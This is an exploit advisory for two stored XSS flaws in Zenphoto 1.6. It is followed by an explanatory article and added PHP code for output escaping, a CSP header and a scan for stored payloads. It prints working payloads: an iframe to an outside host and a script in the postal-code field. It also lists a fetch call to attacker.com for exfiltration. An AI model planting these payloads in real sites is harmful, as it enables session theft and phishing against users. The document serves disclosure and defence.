Zenphoto 1.6 - Multiple stored XSS
Exploit Title: Zenphoto 1.6 - Multiple stored XSS
Application: Zenphoto-1.6 xss poc
Version: 1.6
Bugs: XSS
Technology: PHP
Vendor URL: https://www.zenphoto.org/news/zenphoto-1.6/
Software Link: https://github.com/zenphoto/zenphoto/archive/v1.6.zip
Date of found: 01-05-2023
Author: Mirabbas Ağalarov
Tested on: Linux
2. Technical Details & POC
========================================
###XSS-1###
steps:
1. create new album
2. write in Album Description: <iframe src="https://14.rs"></iframe>
3. save and view album http://localhost/zenphoto-1.6/index.php?album=new-album or http://localhost/zenphoto-1.6/
=====================================================
###XSS-2###
steps:
1. go to the user account and change the user data (http://localhost/zenphoto-1.6/zp-core/admin-users.php?page=users)
2. change the postal code to <script>alert(4)</script>
3. if the admin user information is inserted into the page as HTML, the XSS will trigger
poc video : https://youtu.be/JKdC980ZbLY

Understanding Zenphoto 1.6: Multiple Stored XSS Vulnerabilities
Security researchers have identified critical stored cross-site scripting (XSS) vulnerabilities in Zenphoto 1.6, a widely used PHP-based photo gallery application. These flaws allow attackers to inject malicious scripts that persistently execute when viewed by users, posing a serious threat to both end-users and administrators.
Overview of the Vulnerability
Zenphoto, a lightweight, open-source photo management system, has long been favored for its simplicity and extensibility. However, version 1.6—released in early 2023—contains multiple stored XSS bugs that compromise data integrity and user safety. The vulnerabilities were discovered by Mirabbas Ağalarov on May 1st, 2023, and verified on Linux environments.
Stored XSS differs from reflected XSS in that the malicious payload is saved in the application’s database or file system. Unlike reflected XSS, which requires a crafted URL to trigger, stored XSS attacks are persistent and can affect any user who accesses the vulnerable content.
Exploitation Details: XSS-1 – Album Description Injection
One of the most straightforward exploitation paths involves creating a new album with a malicious description.
- Access the album creation interface via the admin panel.
- Enter the following in the Album Description field:
<iframe src="https://14.rs"></iframe>

This HTML snippet embeds a remote iframe, which can be used to redirect users to a malicious website or perform phishing attacks. The iframe is not filtered or sanitized during storage, allowing it to be rendered directly in the gallery view.
Once saved, the malicious content becomes visible to any user visiting the album page:
http://localhost/zenphoto-1.6/index.php?album=new-album
Upon loading, the iframe executes, potentially leading to:
- Stealing user credentials via phishing
- Redirecting users to malicious domains
- Injecting malware via JavaScript execution
Exploitation Details: XSS-2 – User Profile Data Manipulation
A second, more subtle vulnerability arises in the user account management section. When administrators modify user data—specifically the postal code field—malicious scripts can be stored directly in the database.
Steps to exploit:
- Navigate to the user management page: http://localhost/zenphoto-1.6/zp-core/admin-users.php?page=users
- Modify the postal code field to include:
<script>alert(4)</script>

If the application renders user data as HTML without proper sanitization, this script will execute automatically when the profile is viewed by an admin or other authorized user.
While this example uses alert(4) for demonstration, in real-world scenarios, attackers could use:
- document.cookie to steal session tokens
- fetch('https://attacker.com/steal') to exfiltrate data
- eval() to execute arbitrary code
This vulnerability highlights a critical flaw in input handling—the application fails to sanitize user-provided data before rendering it in the frontend.
Impact and Risk Assessment
| Vulnerability | Severity | Exploitation Ease | Impact |
|---|---|---|---|
| XSS-1: Album Description | High | Easy | Public exposure, phishing, session hijacking |
| XSS-2: User Profile Data | High | Medium | Admin-level compromise, data leakage |
Both vulnerabilities allow attackers to persistently inject code into the application’s output. Given that Zenphoto is often deployed in public-facing environments, these flaws can lead to widespread exploitation.
Root Cause Analysis
These XSS vulnerabilities stem from two primary issues:
- Missing input sanitization: The application does not validate or escape user input before storing or displaying it.
- HTML rendering without filtering: User data—such as album descriptions and profile fields—is rendered directly in the browser without escaping special characters.
For example, the <script> tag is not converted to &lt;script&gt; (HTML-encoded), allowing execution.
Recommended Fixes and Best Practices
To mitigate these risks, developers should implement the following security measures:
- Use HTML escaping functions like htmlspecialchars() in PHP before outputting user data.
- Implement input validation using whitelisting or regex patterns to restrict allowed characters.
- Enable Content Security Policy (CSP) headers to block inline scripts and iframe sources.
- Use secure session management to prevent session theft via XSS.
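The following is an added example (not Zenphoto's own code) that applies the first and third recommendations above to the two fields named in the advisory. It goes slightly beyond the list: besides escaping for an HTML element body, it shows the separate escaping needed when a stored value is placed into an inline script, and a nonce-based Content-Security-Policy whose `frame-src 'none'` directive would also block the iframe payload. The function names, the CSP directives chosen and the sample values are assumptions made for illustration.

```php
<?php
// Added example (not Zenphoto's own code): context-aware output encoding plus a
// restrictive Content-Security-Policy for the two advisory fields. Function names
// and sample values are assumptions for illustration.

// Escape for an HTML element body or a quoted attribute value. ENT_QUOTES covers
// both single- and double-quoted attribute contexts; ENT_SUBSTITUTE keeps
// malformed UTF-8 from silently producing an empty string.
function esc_html(string $value): string {
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

// Escape for embedding a value inside an inline <script> as a JS string literal.
// The JSON_HEX_* flags also encode <, >, & and quotes, so a "</script>" inside
// the value cannot close the script element early.
function esc_js(string $value): string {
    return json_encode(
        $value,
        JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT | JSON_THROW_ON_ERROR
    );
}

// Send a CSP that forbids inline scripts (only nonce-bearing ones run) and any
// framed content, so an unescaped <iframe src="https://14.rs"> would still be
// refused by a CSP-aware browser. Directive choice is an assumption.
function send_csp_header(string $nonce): void {
    $policy = "default-src 'self'; "
        . "script-src 'self' 'nonce-" . $nonce . "'; "
        . "frame-src 'none'; object-src 'none'; base-uri 'self'";
    header('Content-Security-Policy: ' . $policy);
}

// Render the album description and the postal code into three contexts and
// return the HTML so it can be inspected.
function render_album(string $description, string $postalCode, string $nonce): string {
    return '<div class="album-desc">' . esc_html($description) . '</div>' . "\n"
        . '<input type="text" name="postal" value="' . esc_html($postalCode) . '">' . "\n"
        . '<script nonce="' . esc_html($nonce) . '">var postal = ' . esc_js($postalCode) . ';</script>' . "\n";
}

// Constructed sample input: the exact payloads from the advisory.
$description = '<iframe src="https://14.rs"></iframe>';
$postalCode  = '<script>alert(4)</script>';
$nonce       = bin2hex(random_bytes(16));

if (PHP_SAPI !== 'cli') {
    send_csp_header($nonce);
}
$html = render_album($description, $postalCode, $nonce);
echo $html;

// Every '<' that came from user data is now '&lt;' or '\u003C', so neither
// payload is parsed as markup; the only real <script> element is the nonced one.
assert(substr_count($html, '<script') === 1);
assert(strpos($html, '<iframe') === false);
```

Run it with `php example.php` to see the three encoded renderings; the postal code shows up as `&lt;script&gt;alert(4)&lt;/script&gt;` in the element and attribute contexts and as `"\u003Cscript\u003Ealert(4)\u003C\/script\u003E"` inside the script. The point of the three functions is that the escaping rule depends on where the value lands, which is why a single `htmlspecialchars()` call at the storage layer is not a substitute for escaping at output time.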
Example Fix: Replace unsafe output with sanitized rendering:

```php
<?php
// Unsafe: Direct output
echo $album_description;
// Safe: Sanitized output
echo htmlspecialchars($album_description, ENT_QUOTES, 'UTF-8');
?>
```

By escaping special characters, the browser treats the input as plain text, preventing script execution.
Conclusion
Zenphoto 1.6’s stored XSS vulnerabilities demonstrate the importance of secure input handling in web applications. Even seemingly benign fields like postal code or album description can become attack vectors if not properly sanitized.
For users and administrators, immediate action is advised:
- Update to a patched version if available
- Apply input validation rules manually
- Monitor logs for suspicious activity
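As an added example (not Zenphoto's own code) of the monitoring step, the script below audits already-stored album descriptions and user profile fields for markup, so an administrator can locate payloads that were saved before output escaping was fixed. The rows are constructed samples; the table and column names, the pattern set and the function names are assumptions, and in a real deployment the rows would be read from the database with PDO.

```php
<?php
// Added example (not Zenphoto's own code): audit stored album and user fields
// for markup that should never appear in plain-text data. Table and column
// names, the patterns and the sample rows are assumptions/constructed data.

const SUSPICIOUS_PATTERNS = [
    // opening or closing tags that can execute or load content
    'html_tag'      => '/<\s*\/?\s*(script|iframe|img|svg|object|embed|link|meta|style|form)\b/i',
    // inline event handler attributes such as onerror= or onload=
    'event_handler' => '/\bon[a-z]+\s*=/i',
    // URI schemes that execute or smuggle content
    'js_uri'        => '/(?:javascript|data|vbscript)\s*:/i',
];

// Return the pattern names that match one stored value. The value is tested both
// raw and entity-decoded, because a field that was stored already-encoded can
// still be decoded back into markup by a later rendering step.
function classify_value(string $value): array {
    $hits = [];
    $decoded = html_entity_decode($value, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    foreach (SUSPICIOUS_PATTERNS as $name => $regex) {
        if (preg_match($regex, $value) || preg_match($regex, $decoded)) {
            $hits[] = $name;
        }
    }
    return $hits;
}

// Scan rows shaped like ['table' => ..., 'id' => ..., 'field' => ..., 'value' => ...]
// and return only the rows that matched, annotated with the matching pattern names.
function scan_rows(array $rows): array {
    $findings = [];
    foreach ($rows as $row) {
        $hits = classify_value((string) $row['value']);
        if ($hits !== []) {
            $row['patterns'] = $hits;
            $findings[] = $row;
        }
    }
    return $findings;
}

// Constructed sample rows; two carry the exact advisory payloads, one carries
// an entity-encoded payload, two are benign.
$rows = [
    ['table' => 'zp_albums',         'id' => 1, 'field' => 'desc',        'value' => 'Holiday pictures 2023'],
    ['table' => 'zp_albums',         'id' => 2, 'field' => 'desc',        'value' => '<iframe src="https://14.rs"></iframe>'],
    ['table' => 'zp_administrators', 'id' => 7, 'field' => 'custom_data', 'value' => '<script>alert(4)</script>'],
    ['table' => 'zp_administrators', 'id' => 8, 'field' => 'custom_data', 'value' => 'AZ1000'],
    ['table' => 'zp_albums',         'id' => 3, 'field' => 'desc',        'value' => '&lt;img src=x onerror=alert(1)&gt;'],
];

foreach (scan_rows($rows) as $f) {
    printf("%s id=%d field=%s patterns=%s\n",
        $f['table'], $f['id'], $f['field'], implode(',', $f['patterns']));
}
```

Running it prints three findings: album 2 and administrator 7 match `html_tag`, and album 3 matches both `html_tag` and `event_handler` because the entity-decoded copy reveals the `<img ... onerror=>` payload. The `event_handler` pattern is deliberately broad and will also flag harmless text such as "season=2023", so treat the output as a review queue rather than an automatic delete list, and re-run the scan after applying output escaping to confirm nothing new is being stored.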
Security is not a one-time task—it requires continuous vigilance, especially in open-source projects where community contributions may introduce unforeseen risks.